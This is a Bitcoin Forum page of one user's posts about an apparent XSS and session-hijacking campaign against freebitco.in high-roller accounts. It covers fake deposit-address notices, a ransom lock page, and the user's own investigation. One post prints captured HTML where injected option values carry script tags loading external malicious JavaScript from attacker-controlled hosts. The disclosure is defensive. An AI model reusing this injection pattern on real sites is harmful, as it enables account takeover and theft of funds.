Bitcoin Forum
November 07, 2024, 07:03:52 AM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1] 2 »
1  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: August 28, 2024, 05:52:50 PM
Because of recent problems, I also decided to withdraw funds from my account.
Fortunately "slow method" worked fine and was processed in about 5h.

2  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 05, 2024, 01:26:33 PM
So it looks like the second wave of attacks has been completed.
Attackers github profile has been deleted and malicious script removed from cdn site.
I believe that again it was done by the attackers to cover their tracks.
No evidence, so nothing to prove.

It's only matter of time when they strike again and whole history will come full circle.
As long as the vulnerability is not patched the attacker can exploit it whenever he wants.
Of course, he should not exaggerate so not to draw too much attention.
Small group of high rollers will be attacked again, they will report an issue, but no one will believe it. They will be accused of spreading fud/trolling etc, because other accounts will be working as usual.
Even after so many reports there are still users who are deeply convinced that issue is on clients side, that our machines got compromised/got malware...etc
It just show how this method is effective.
3  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 10:51:43 PM
except that i sended 2000€ to an address that has been changed my account has been drained aswell

Thats another 19300€ worth of bitcoin.

The reason I started a topic Bitcoin is hacked and they are well aware of it.
You can not tell me that after so many people mailed them or contacted them in other ways they are not informed.
second its inpossible to change the sourcecode of a website, to change the intro page you must have access to the server and since the server is protected by cloudflare it is not that easy. therefor there is no such a thing of an injection of a wrong script, its already loaded as soon as you go to the site.

blocking the javascript results in not be able to log in nor to get the accountaddress back.

I have a ugly feeing that we all got scammed by a website and address held on the virgin islands, and that those 2 boys scouts are nicely vanished with our money.

Of course I could be wrong, but from my point of view attackers are able to put link into particular place on fbc website.
And it's exactly:
FBC -> "REFER" tab -> "ADVANCED TRACKING USING TAGS" button -> "SELECT A TAG TO VIEW ITS STATS" and link is hidden in drop down list.
It was not visible from GUI, but it was somehow placed into html code.

Link leads to malicious script which is executed during website loading.
And because of it website content can be modified.

Not affected accounts don't have any links placed/injected into their session in that location.
Affected user i.e @Drazen2003:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
          <option value="<script src=https://cashtravel.info/forum/main.js></script>">
                <script src="https://cashtravel.info/forum/main.js"></script>
            </option>
            <option value="<script src=https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js></script>">
                <script src="https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js"></script>
            </option>

        </select>
 
Not affected user:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
        </select>
4  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: May 04, 2024, 03:01:02 PM
I’m curious regarding out of many players on this casino why you guys experienced this kind of script attack. Maybe there’s something common with you guys that you are doing on your account.

It was already mentioned, but there is quite a mess in posts.
Only small group of users where targeted - mainly high rollers.
So most of us are users whose IDs where published on leaderboard of daily jackpot, monthly wagering or referral contest.
5  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: May 04, 2024, 02:46:33 PM
Oh, that's new!
@Drazen2003
Attackers in your case injected another script - it's under new location and for sure code is different.
Script source code is obfuscated, so it's not easy to decode.
We can try to obfuscate using https://deobfuscate.io/ but it's still not easy to understand.

Try to block this script https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js, delete cookies or clear your browser history than log into fbc and check again.

My case was different - there was only 'cashtravel' script.
Link to my case if somebody missed it - https://bitcointalk.org/index.php?topic=5492456.0
6  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 11:02:55 AM
Yes, but in my case it was different.
Please read the point 1. from  my first post in this topic.
My deposit address also has changed but after about 2 weeks backed to normal.

I believe that this whole attack campaign started in second half of March.
At that time was reading first posts about change in deposit addresses.
My account was attacked in the first wave, but now when I read about new victims(second wave?) it looks like attackers much improve themself.
Hijacking sessions, making unauthorized withdrawals and bypassing 2FA - it looks very serious.

Edit:
According to information shared from user @Drazen2003
There is completely new link injected  into his session.
New link leads to new malicious script:
https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js

I did some investigation and it looks like about 23th April started the second wave of attacks.
That day attacker created his account on github and placed there new malicious script.
After that he published it on cdn site.
Attacker profiles:
https://github.com/feleryunfbc
https://www.jsdelivr.com/package/gh/feleryunfbc/js?tab=files
 
7  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 10:27:12 AM
No, nothing.
Yesterday the link was still there.
When claiming free rolls/WoFs I was always checking if it's still there.
I guess things are slowly getting sorted.
Pity, that there is absolutely no communication from fbc to community.
8  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 09:56:06 AM
Link to malicious script disappeared today from my user session.
It is no longer visible in website's html code.

Today:


Before:
9  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 10:17:45 PM
I believe that only small group of high rollers were targeted or at least users whose IDs where published on leaderboard of daily jackpot, monthly wagering or referral contest.
I believe the vulnerability can't be exploited without a valid user ID and the attackers are definitely getting those IDs from the jackpot leader board. This explains why only a limited number of users were affected by this attack.
If freebitco.in team are aware of this ND didn't take any action, that's bad. If they aren't, that's even worse!

Hard to say, maybe in your case, at some point attackers managed to overwrite deposit address and make it fixed somewhere in website's html code.
The difference between your case and his is that he made a deposit while you didn't. Since you didn't make a deposit, the attacker probably decided to change his tactic by making you believe your account got banned.

Sure, but by "valid ID" they just need any ID of active user with some balance.
On fbc platform user ID is just an ordinal number defining when user registered himself.
So it can be any number from 1 to number_of_all_users (i.e the famous site creator - wetsuit has ID=4 - according to his referral link)
I think attackers can hijack any user session, but by doing it they would attract too much attention.
Lots of accounts are deleted, abandoned, inactive or with too low balance to do anything.
So for these obvious reasons there is no point to attack them all.
Attackers chose only small group of active accounts and that works.

I created account here to share info about it and warn you.
From the very beginning, because of newbie rank I was accused of being troll, spreading fud etc. - that was never my intention.
I'm aware that vast majority of fbc accounts are clean and not affected - sure, but for how long...
Just be careful guys.
10  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 07:09:28 PM
Hard to say, maybe in your case, at some point attackers managed to overwrite deposit address and make it fixed somewhere in website's html code.
They had customized scripts, so every case can be different.
And since fbc is not quick to act, attackers had time to adapt and improve their scripts or even improve the whole attack scenario.

I sent email about 2 weeks ago, but still waiting for response.
11  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 06:24:37 PM
Yeah, I believe that only small group of high rollers were targeted or at least users whose IDs where published on leaderboard of daily jackpot, monthly wagering or referral contest.
And that's understandable - these accounts have active users and should have enough BTC balance to make a withdrawal.

Attackers managed to inject malicious script into a particular user's session (by a known ID).
In my case it was https://cashtravel.info/forum/main.js.
Now, attackers could change location of malicious script and even improve its code.

I saw that one of the Legendary user became a victim of similar attack, so maybe now this issue will get a proper attention.
12  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: April 12, 2024, 04:59:14 PM
Did you contact freebitco.in.in support team to inform them about this. You should do this ASAP so they can investigate what happened and fix the problem in case there is a vulnerability in their website.
Based on the information you shared it's unlikely that your device or network are compromised since there are other victims and the hacker is targeting high rollers, so all he has is their IDs.

No, at least not yet.
I think I don't have enough evidence to prove anything.


It looks like you're not the only one who experienced this since march, some of its users too complained on their ANN thread[1], you can make a post there too linking this thread. But as long as there's no response from TheQuin, this will not be cleared. Maybe this is just a technical issue of not reflecting the new address's balance or what, lastly the site might be hacked that way, i hope it's no though. But for the mean time, what you need to do is to wait and don't try to deposit again on the site.

[1] https://bitcointalk.org/index.php?topic=319540.9100

Yeah, since my account could be compromised will definitely not deposit there anything soon.
I have changed my password, but still have some security concerns.
For sure attacker can't withdraw anything because of 2FA.
If he managed to hijack my session he can harm me by using my balance to gamble and loose it on purpose.
I was able to withdraw my all BTC funds, but there is still quite big bag of Fun Tokens left.
For now they are locked, I will try to reach them when FUN savings matured.
13  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 11, 2024, 07:55:04 PM
Like mentioned some posts earlier I have started new topic about recent attack attempts on my fbc account.
https://bitcointalk.org/index.php?topic=5492456.0

You can find there my side of the story.

tldr:
I just wanted to inform you about these incidents. Be careful and protect your funds.
Someday it can also happen to you and to any service on the Internet.
14  Economy / Scam Accusations / [WARNING] Attack on freebitco.in account on: April 11, 2024, 05:45:09 PM
Hi,
I would like to share my recent experience using freebitco.in.
There were some attack attempts on my account.
I have been using fbc for years and I've never had any serious problems with the platform.

So, to the point.
I have faced two issues. First one started about week ago.

1. Fake notification about change of deposit address.
There was a notification placed on the main page and looked exactly like any other notification on fbc.
You know, yellow rectangle in a frame.
Same colors, same fonts i.e:


There was an information about change in deposit address - something more or less like "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee."
By clicking on Deposit button there was indeed new bitcoin address starting with digit '3...'
It looked very convincing, but I ignored this notification because I didn't plan to make any deposit soon.

I found at least three other users on this forum who faced the same issue:
Below you can find some other user's screenshot - I have just marked parts of this false notification. It's only partially visible in the background.


According to messages from these users, they actually deposit some funds to new addressees but they were never credited to their fbc account (they even posted their User IDs, TX hashes etc.).

Like I said before, I did not pay much attention to it because I didn't plan to make deposit, but this notification was somehow added/injected into html website code.
Notification looked very convincing but I just wasn't interested with it.
I simply ignored it and I was using fbc as usual.
Beside this notification everything looked and worked as always.
As usual I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo etc.

After few days, this notification disappeared and deposit address came back to the previous one - legacy format started with '1...'
My thoughts were that they just performed roll back from this change and that's all.

On 9th April I faced second issue.

2. XSS attack?

During another session in Hi-Lo game suddenly my account has been locked.
Instead of fbc website there was a blank page with a message:
"Your account is locked. Please contact @hallohap_1 on telegram or fellowyun@proton.me email. Failure to comply will result to a lost of funds"

I was quite shocked.
I have only one account, I was never using any VPNs or bots.
As usual I was just using built-in feature "auto-bet" and that's all.

I sent a message to fellowyun@proton.me asking what happened.

After few hits of refresh button in my browser blockpage has changed to:
"Your account is locked. Please contact @hallohap_1 on telegram or bellera12@proton.me email. Failure to comply will result to a lost of funds"


So, I sent the same  message to new e-mail address.
Than started a typical ransom scheme. At this point I didn't know how attacker achieved it, so for me the threat was real.  
I've got a response:
"Your browser is hacked. Send 0.5 btc to bc1qhrdvuxrealra5xm7qsu9tyh06k3frcrzuvsms7 to unlock it. Why trust me? I cant withdraw your money because it needs otp and email. Ill wait 1hr before I drain it"

I knew that sending 0,5 btc is pointless so I started to investigate this attack.
After some time I got another message from attacker that I'm running out time.
I tried to gain some time for myself by tricking him.


I wiped my entire browser history, tried on a different browser in private/incognito mode, I changed the device to clean PC with different operating system, I even changed DNS servers - everything was exactly the same - blank page with message about locked account.
And this all happened with 2FA enabled.
Then, I started checking logs. In developer tools built in browser I saw entries about loading of a strange js script under https://cashtravel.info/forum/main.js, I blocked it with a "NoScript!" browser plugin. and after that fbc page was unlocked.
Extremely stressed, no thinking much I went straight to Withdraw button and chose Instant Method.
At that point I didn't know how attacker performed this scam, so I was afraid that he will replace withdrawal address on the fly or hijack OTP - but I had no options.
Fortunately I was able to withdraw all my BTC funds.
Instant method worked out well and after ~30min I had all my funds confirmed and stored on my wallet.

How it happened?
I'm not sure.
I have enabled 2FA, I used clean device and issue was still visible. My fbc account email is used only for fbc purpose, so there was no chance for any phishing attacks.
I also don't believe that attacker actually compromise my entire network or all devices I have. For me its impossible or at least it would cost to much effort.

From my point of view attacker found some vulnerability in fbc or 3rd party service they use and managed to exploit it.
I suppose that attacker somehow inject link to external source with malicious script.
In the source code of this malicious script there were hardcoded user IDs. He managed to hijack sessions from specific users.

Why and how I was attacked?
I believe that attacker was targeting highrollers and taking user IDs from wagering leaderboard.
For few days in a row my user ID was shown in the top10 wagering contest.

It's hard to proof now anything.
At some point script was changed and removed.
Source of one version of this script can be found under https://pastebin.ai/eo0q78pbuj
This particular script was prepared to attack user with ID 31898443 who won daily jackpot on 2024-04-08.

At present there is no any script at https://cashtravel.info/forum/main.js
I believe that attacker delete it to cover his tracks.

On my account I still have injected link to malicious script.
I have blocked it from executing but it's still present in a html code.
15  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 11, 2024, 12:46:57 PM
Everything was looking legitimate. This message was looking exactly the same as any other notification on fbc site. Same fonts, same colors, etc.

Now everything works as usual, so I guess I will never know what happened.
It doesn't look legitimate when you see such a message and someone asks you to contact them on their protonmail email. I know that Protonmail is used for privacy purposes but no company should write you or contact you with Proton email because they are LTD, they have responsibilities and they shouldn't be the one protecting their privacy on that level. Company should be public, open and should be using their own email servers instead of Proton.
So, asking for deposit and contacting on telegram or protonmail was already a red flag.

By the way, I don't understand what happened exactly, was that problem on your router? Or were all of your computers infected? Or was it actually the problem from Freebitco's side?

Ok, so since you actually asked, I will start a new topic about it and try to explain whole situation again.

I also think that it's not the right place to continue this story.
If somebody is interested with it and have any questions you can always ask me there.
Just give me some time to gather things and describe whole story from the beginning.

Like I said before, I have registered account here mainly to show what I faced.
Fortunately, I was not fooled, but the matter looked serious.
16  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 10, 2024, 08:06:11 PM
What a shit show this is? A person who claims he used a loophole in a site to steal money from other users... and users who ask the thief to return the money.

@FelErYun Show us a screencast of this exploit. Otherwise I say fake. And the reports you sent, why not publish them here (without the details) or on forum thread. FBC will quickly see it.

I think they are all fake... Except for a bunch of words, I didn't see any screenshots, transactions, or any kind of evidence that would back up their stories. There's a scam accusation section, if some members think they have been cheated/scammed in any way they can open a topic there and attach all the evidence they have. Without proof, no one will believe these claims.


In sum up there were two attack attempts; first was the injection of fake notification that fbc deposit address has changed and second one with defaced website containing message about locked account and attempt to get ransom from unlocking it.

If you really interested in this case just try to read my posts and my conversation with other users.
I registered account here mainly to show the issue I faced.
Luckily I avoided of being scammed and I think I described quite well my side of the story.
In my posts you can find a lot of screenshots including defaced website, emails from scammers, proof of injected malicious script etc.
Some posts above you can even find a source code of the script used to attack some other user.
I didn't deposit any funds to scammers, but other users actually posted massages with all information you mentioned (TX hash, deposit addresses, User IDs) - but this is in another topic about fbc - https://bitcointalk.org/index.php?topic=319540.9100

17  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 10, 2024, 11:36:27 AM
I checked this on different clean device which was never used for fbc (different OS, different browser, different DNS servers) and still my session was somehow hijacked.
It's also possible that my router is compromised but it's highly unlikely.
From my point of view.. I know it's hard to believe and even I have doubts, but it looks like fbc had some security breach or some 3rd party service they were using. Attackers were targeting only some small group of users (including me) and they managed do inject malicious script only for some accounts.
For a week or so I was also getting notifications about change in deposit address (change to P2SH segwit addresses started with 3...), but I ignored that because I didn't plan to make deposits.
Everything was looking legitimate. This message was looking exactly the same as any other notification on fbc site. Same fonts, same colors, etc.

Now everything works as usual, so I guess I will never know what happened.

I don't know much about this kinda thing but from what I know about friends in IT, we have a lot of customers who send us client emails like this, it's always clients.

Server side issues usually very difficult to target specific clients from server, and I'm a user like you, very active, very old, and using a lot of features to earn interest etc. I never once got this kind of issue.

I did however get funds withdrawed a few years ago (and somehow never got the confirmation email) but since I did 2FA, nothing ever happened.

If you using on new device and everything works as usual... it kinda confirms the theory your device/software got infected. Glad your funds are safe mate!

@FelErYun Show us a screencast of this exploit. Otherwise I say fake. And the reports you sent, why not publish them here (without the details) or on forum thread. FBC will quickly see it.

No, it started to work when I blocked the malicious script injected into my account session.
It also worked when I unblocked the script, but its code was already changed to target another user.
No matter on what device/software.  I had also 2FA enabled.

He stole a whole $250 AUD from me. Well played sir, I didn't pick this up as I was doing it on my mobile, if I was on my pc i would've been safe.

I reported the cash website link to go daddy so they removed that quite quickly the malicious js.



At present script is removed from external source, but it could also be done by attacker himself just to cover his tracks.
For now his method is burnt, but he can try again once the dust has settled.
New script, new link to malware etc.
When logged, I still have link to malicious script side-loaded into html source of a main fbc page.
It's blocked from executing, but it's still there.

Be careful guys.
Customer service is almost impossible to reach, so if you ended up with an issue, you're mostly on your own.
We don't know the real scale of this attack, because majority of fbc user don't even know about existence of this forum.
18  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 09, 2024, 09:47:34 PM
seems they are targeting the winners of the multiply btc list which i am on there.....

I've just blocked the malicous script with adblock add this  to your block list https://cashtravel.info/forum/main.js

We need to figure out what's injecting that script into the freebitco.in website's HTML. It doesn't seem to be coming from their end, based on what I can see. My HTML source code is clean and free of any suspicious js calls from cashtravel(dot)info domain.


As far as I can see, malicious code is added to main site document named "?op=home"

Below some screenshots how it looks on my side.




Edit:
And also in default index document.
19  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo0.2BTC DailyJackpot$32,500 Wager Contest on: April 09, 2024, 04:13:54 PM
When issue was visible I saw that fbc page was loading and after short period of time it's getting covered by some kind of blockpage.
Like message about locked account is in the foreground and a normal fbc webpage is in the background. I tried to blocked it by adding filter to "ublock" plugin but without success.
Then a tried to check network logs from developer tools built-in browser.
I also saw this suspicious url bitwrecked.
 
Unfortunately I didn't took any usefull screenshots or save any logs.
I know that now it's impossible to proof anything.

At some point when I had these two scripts blocked it started to work


But now even with allowed these two scripts to run, page is loading successfully without any concerns.
It looks and works as usual.

seems they are targeting the winners of the multiply btc list which i am on there.....
I was in the top10 daily jackpot leaderboards for a few days in a row.  It could be it.


It just stops auto-roll when you hit 98>= satoshi profit during your rolling session.
To get bonus balance transferred do you "main balance" you have to wager a specific amount of BTC.

in the script its got a user ID of 31898443 who won yesterdays to lock there account.@zibi its the cash travel script that's doing it.

Oh, that's very interesting finding.
My account has different ID, but I believe that scammers have changed the script few hours ago to attack another active user.
20  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 09, 2024, 04:01:44 PM
When issue was visible I saw that fbc page was loading and after short period of time it's getting covered by some kind of blockpage.
Like message about locked account is in the foreground and a normal fbc webpage is in the background. I tried to blocked it by adding filter to "ublock" plugin but without success.
Then a tried to check network logs from developer tools built-in browser.
I also saw this suspicious url bitwrecked.
 
Unfortunately I didn't took any usefull screenshots or save any logs.
I know that now it's impossible to proof anything.

At some point when I had these two scripts blocked it started to work


But now even with allowed these two scripts to run, page is loading successfully without any concerns.
It looks and works as usual.

seems they are targeting the winners of the multiply btc list which i am on there.....
I was in the top10 daily jackpot leaderboards for a few days in a row.  It could be it.


It just stops auto-roll when you hit 98>= satoshi profit during your rolling session.
To get bonus balance transferred do you "main balance" you have to wager a specific amount of BTC.
Pages: [1] 2 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!